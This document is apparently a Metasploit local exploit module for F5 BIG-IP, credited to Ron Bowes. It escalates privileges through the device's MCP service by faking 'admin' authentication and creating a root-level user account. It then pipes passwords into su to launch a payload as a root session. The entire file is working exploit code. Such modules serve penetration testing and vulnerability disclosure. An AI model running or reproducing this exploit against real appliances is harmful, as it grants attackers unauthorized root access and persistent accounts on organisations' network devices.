<pre><code>## # This module requires Metasploit: https://metasploit.com/download # Current source: https://github.com/rapid7/metasploit-framework ## require 'unix_crypt' class MetasploitModule < Msf::Exploit::Local include Msf::Post::Linux::F5Mcp include Msf::Exploit::CmdStager def initialize(info = {}) super( update_info( info, 'Name' => 'F5 Big-IP Create Admin User', 'Description' => %q{ This creates a local user with a username/password and root-level privileges. Note that a root-level account is not required to do this, which makes it a privilege escalation issue. Note that this is pretty noisy, since it creates a user account and creates log files and such. Additionally, most (if not all) vulnerabilities in F5 grant root access anyways. Adapted from https://github.com/rbowes-r7/refreshing-mcp-tool/blob/main/mcp-privesc.rb }, 'License' => MSF_LICENSE, 'Author' => ['Ron Bowes'], 'Platform' => [ 'unix', 'linux', 'python' ], 'SessionTypes' => ['shell', 'meterpreter'], 'References' => [ ['URL', 'https://github.com/rbowes-r7/refreshing-mcp-tool'], # Original PoC ['URL', 'https://www.rapid7.com/blog/post/2022/11/16/cve-2022-41622-and-cve-2022-41800-fixed-f5-big-ip-and-icontrol-rest-vulnerabilities-and-exposures/'], ['URL', 'https://support.f5.com/csp/article/K97843387'], ], 'Privileged' => true, 'DisclosureDate' => '2022-11-16', 'Arch' => [ ARCH_CMD, ARCH_PYTHON ], 'Type' => :unix_cmd, 'Targets' => [[ 'Auto', {} ]], 'Notes' => { 'Stability' => [], 'Reliability' => [], 'SideEffects' => [] } ) ) register_options([ OptString.new('USERNAME', [true, 'Username to create (default: random)', Rex::Text.rand_text_alphanumeric(8)]), OptString.new('PASSWORD', [true, 'Password for the new user (default: random)', Rex::Text.rand_text_alphanumeric(12)]), OptBool.new('CREATE_SESSION', [true, 'If set, use the new account to create a root session', true]), ]) end def exploit # Get or generate the username/password fail_with(Failure::BadConfig, 'USERNAME cannot be empty') if datastore['USERNAME'].empty? username = datastore['USERNAME'] if datastore['CREATE_SESSION'] password = Rex::Text.rand_text_alphanumeric(12) new_password = datastore['PASSWORD'] || Rex::Text.rand_text_alphanumeric(12) print_status("Will attempt to create user #{username} / #{password}, then change password to #{new_password} when creating a session") else password = datastore['PASSWORD'] || Rex::Text.rand_text_alphanumeric(12) print_status("Will attempt to create user #{username} / #{password}") end # If the password is already hashed, leave it as-is vprint_status('Hashing the password with SHA512') hashed_password = UnixCrypt::SHA512.build(password) if !hashed_password || hashed_password.empty? fail_with(Failure::BadConfig, 'Failed to hash the password with String.crypt') end # These requests have to go in a single 'session', which, to us, is # a single packet (since we don't have AF_UNIX sockets) result = mcp_send_recv([ # Authenticate as 'admin' (this probably shouldn't work but does) mcp_build('user_authenticated', 'structure', [ mcp_build('user_authenticated_name', 'string', 'admin') ]), # Start transaction mcp_build('start_transaction', 'structure', [ mcp_build('start_transaction_load_type', 'ulong', 0) ]), # Create the role mapping mcp_build('create', 'structure', [ mcp_build('user_role_partition', 'structure', [ mcp_build('user_role_partition_user', 'string', username), mcp_build('user_role_partition_role', 'ulong', 0), mcp_build('user_role_partition_partition', 'string', '[All]'), ]) ]), # Create the userdb entry mcp_build('create', 'structure', [ mcp_build('userdb_entry', 'structure', [ mcp_build('userdb_entry_name', 'string', username), mcp_build('userdb_entry_partition_id', 'string', 'Common'), mcp_build('userdb_entry_is_system', 'ulong', 0), mcp_build('userdb_entry_shell', 'string', '/bin/bash'), mcp_build('userdb_entry_is_crypted', 'ulong', 1), mcp_build('userdb_entry_passwd', 'string', hashed_password), ]) ]), # Finish the transaction mcp_build('end_transaction', 'structure', []) ]) # Handle errors if result.nil? fail_with(Failure::Unknown, 'Request to mcp appeared to fail') end # The only result we really care about is an error error_returned = false result.each do |r| result = mcp_get_single(r, 'result') result_code = mcp_get_single(result, 'result_code') # If there's no code or it's zero, just ignore it if result_code.nil? || result_code == 0 next end # If we're here, an error was returned! error_returned = true # Otherwise, try and get result_message result_message = mcp_get_single(result, 'result_message') if result_message.nil? print_warning("mcp query returned a non-zero result (#{result_code}), but no error message") else print_error("mcp query returned an error message: #{result_message} (code: #{result_code})") end end # Let them know if it likely worked if !error_returned print_good("Service didn't return an error, so user was likely created!") if datastore['CREATE_SESSION'] print_status('Attempting create a root session...') out = cmd_exec("echo -ne \"#{password}\\n#{password}\\n#{new_password}\\n#{new_password}\\n#{payload.encoded}\\n\" | su #{username}") vprint_status("Output from su command: #{out}") end end end end </code></pre>